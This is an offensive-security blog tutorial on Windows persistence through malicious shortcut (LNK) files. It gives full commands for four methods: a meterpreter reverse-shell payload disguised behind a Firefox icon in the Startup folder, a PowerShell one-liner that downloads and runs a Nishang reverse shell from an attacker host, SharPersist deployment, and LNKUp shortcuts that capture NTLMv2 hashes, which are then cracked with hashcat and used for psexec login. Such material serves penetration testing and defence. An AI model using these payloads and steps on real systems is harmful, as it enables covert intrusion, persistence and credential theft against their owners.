Introduction
According to MITRE, “Adversaries may
configure system settings to automatically execute a program during system boot
or logon to maintain persistence or gain higher-level privileges on compromised
systems. Operating systems may have mechanisms for automatically running a
program on system boot or account logon.”
Shortcut modification is a technique in
which an attacker can replace the absolute path of an executable bound to be
run by a shortcut and masquerade it as a legitimate looking icon which can be
run on startup thus achieving persistence. In this article, we will look at two
such easy techniques that can help a user gain persistence using this technique.
MITRE TACTIC: Privilege Escalation (TA0004) and Persistence
(TA0003)
MITRE TECHNIQUE ID: T1547 (Boot or Logon Autostart Execution)
SUBTITLE: PE Injection (T1547.009)
Table of content
·
Background
·
PERS1 - Manual shortcut
modification + reverse shell
·
PERS2 - Manual shortcut
modification + Powershell One Liner
·
PERS3 - Shortcut modification
using SharPersist.exe
·
PERS4 - Shortcut creation
and NTLM hash compromise
·
Conclusion
Background
A window’s shortcut file ends with *.LNK
extension and contains the absolute path of an executable which could be run
using this shortcut. Shortcuts have been used for attacks by adversaries since
the time 50 cents was at peak and so was unawareness about cyber security. One
such example includes malware propagation by CDs and DVDs used in public
internet cafes which often contained malicious shortcuts. In modern windows
systems, LNK files are able to run a plethora of files including exe, cmd, vbs,
powershell etc. Now, an attacker can create a new shortcut with powershell
script embedded or can modify an existing shortcut for stealthier attacks. In
this article, we talk about such approaches.
PERS1 - Manual Shortcut Modification + reverse shell
To start with the exploitation, we first
need to set up the payload we would run upon system startup. I created a
meterpreter payload using msfvenom.
msfvenom -p
windows/x64/meterpreter/reverse_tcp lhost=192.168.78.142 lport=1234 -f exe >
shell.exe
Now that it is ready, we can move on
with persistence method 1. Here, we are assuming that we have compromised the
system and already have RDP to the server or any other protocol that lets us
view the GUI of victim. On the victim’s desktop, we found a firefox shortcut.
As you can see, target field in the
shortcut is set to run firefox executable. We simply need to switch it with a
command of our own. In this case, I’ll be running my reverse shell by supplying
in the path of the shell.exe file. Plus, we’ll start this in minimized mode so
that it’s a bit more stealthy.
But as you may have noticed, the icon
has been changed. To replace it back to the desired firefox one, we will click
change icon and point it to the firefox.exe binary.
All must be set and done now and the
icon been replaced to firefox one.
Now, we need to place this shortcut in
the startup folder so that it gets executed every time a system restarts.
%appdata%\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
Note: Make sure to put shell.exe in the \users\public folder for this to run. Upon
restarting the system, our handler has successfully received a reverse shell.
PERS2 - Manual shortcut modification + Powershell One Liner
While the method stated above stands
effective, it needs a user to manually deploy a payload into the victim’s
machine. The next method is a little more subtle. We will be deploying a
powershell one liner in the shortcut file. You can read our article here about more such tactics. Now, we will be using Nishang for the purpose.
In the target path section you need to supply this command as input:
powershell iex (New-Object
Net.WebClient).DownloadString('http://192.168.78.142/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp
-Reverse -IPAddress 192.168.78.142 -Port 4444
You need to change your IP and port as
per your environment.
Now, you need to download the Invoke-PowerShellTcp.ps1
script and run local python server on port 80.
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
python3 -m http.server 80
Now, once the shortcut is put in the
startup folder and the system restarted, we should receive a reverse shell on
our netcat listener!
PERS3 - Shortcut modification using SharPersist.exe
The next method we are going to
demonstrate can be done locally from the client’s terminal (CLI reverse shell).
We will be using a C# implementation of the method displayed earlier called “SharPersist.”
To download this you can run the following command:
wget
https://github.com/mandiant/SharPersist/releases/download/v1.0.1/SharPersist.exe
Upon initial compromise of the victim,
we need to upload this executable on the victim’s system along with the
msfvenom meterpreter payload we made. Now, to create a shortcut using
SharPersist you can run the tool with the following flags:
t=> target folder
c=> command to run upon execution
f=> name of the file
powershell wget 192.168.78.142/SharPersist.exe
-O SharPersist.exe
powershell wget 192.168.78.142/shell.exe
-O shell.exe
SharPersist.exe -t startupfolder -c
"cmd.exe" -a "/c C:\Users\Public\shell.exe" -f
"ignite" -m add
As you might observe, the shortcut
ignite.lnk has been placed in the startup folder. Upon restarting the system,
we received a meterpreter shell!
PERS4 - Shortcut creation and NTLM hash compromise
The last method is the most subtle and
least traceable method of all. Here, we are using a python script called LNKUp to create an LNK file and make the victim authenticate towards our
system and in turn we get a hold of his NTLM credentials. This can be done
using SharPersist too by adding the cmd authenticator command or by calling SMB
share set up in kali (Impacket’s smbserver for example) by using UNC path. To
download and run the file, you need python2.7 and pip2.7 installed. After that
you can generate the LNK payload like following:
apt install python2.7
cd /usr/lib/python2.7
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2.7 get-pip.py
git clone https://github.com/plazmaz/lnkup.git
cd lnkup
python2.7 generate.py --host 192.168.78.133 --type ntlm --output
readme.lnk
Now, we can upload this file to the startup folder manually
using the compromised client’s terminal.
cd C:\Users\hex\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
powershell wget 192.168.78.133/readme.lnk -O readme.lnk
Now, we need to set up a responder on current interface. This
is important as the authentication will be called back to our setup and
responder will catch it.
Now, we wait for the system to restart. As soon as it
restarts, you can see that we have obtained the NTLMv2 hashes
We can copy this into a file called “hash” and use hashcat to
crack them. The module code for NTLMv2 is 5600.
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
--force
As you can see above, the hash has been cracked and clear
text password given as “123.” We can now use these credentials with psexec and
log onto the system.
python3 psexec.py hex:123@192.168.78.141
whoami
Only a few attacks in cyber
security have tested time and malicious shortcut is among one of them. There is
no real fix for this technique from the vendors because it relies on the
gullibility of the victim for this to work much like phishing. We hope you
enjoyed the article. Thanks for reading.
0 comments:
Post a Comment